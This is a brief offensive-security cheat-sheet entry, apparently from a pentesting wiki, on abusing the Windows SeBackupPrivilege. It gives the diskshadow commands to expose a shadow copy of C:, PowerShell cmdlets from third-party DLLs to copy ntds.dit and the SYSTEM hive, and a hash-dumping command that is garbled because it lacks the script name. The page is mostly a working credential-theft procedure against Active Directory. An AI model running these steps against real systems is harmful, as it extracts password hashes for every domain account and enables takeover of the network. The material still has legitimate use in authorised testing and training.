This privilege is a win. We can create a shadow copy of the OS and read secret files such as SYSTEM, SECURITY, NTDS.dit etc

Create a shadow copy and expose it as a network share.

set context persistent nowriters
add volume C: alias morph3
expose %morph3% G:

Diskshadow.exe puts you into an interactive session so If the commands above doesn't work, don't forget to add ; after the commands.

To abuse my SeBackupPrivilege privilege, use the dll below and enable your privilege.

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

After that you can copy the secret files,

Copy-FileSeBackupPrivilege <source> <target>
Copy-FileSeBackupPrivilege G:\windows\NTDS\ntds.dit c:\windows\temp\ntds.dit

And you can dump the hashes locally

python -system ./SYSTEM -ntds ./ntds.dit LOCAL

Last updated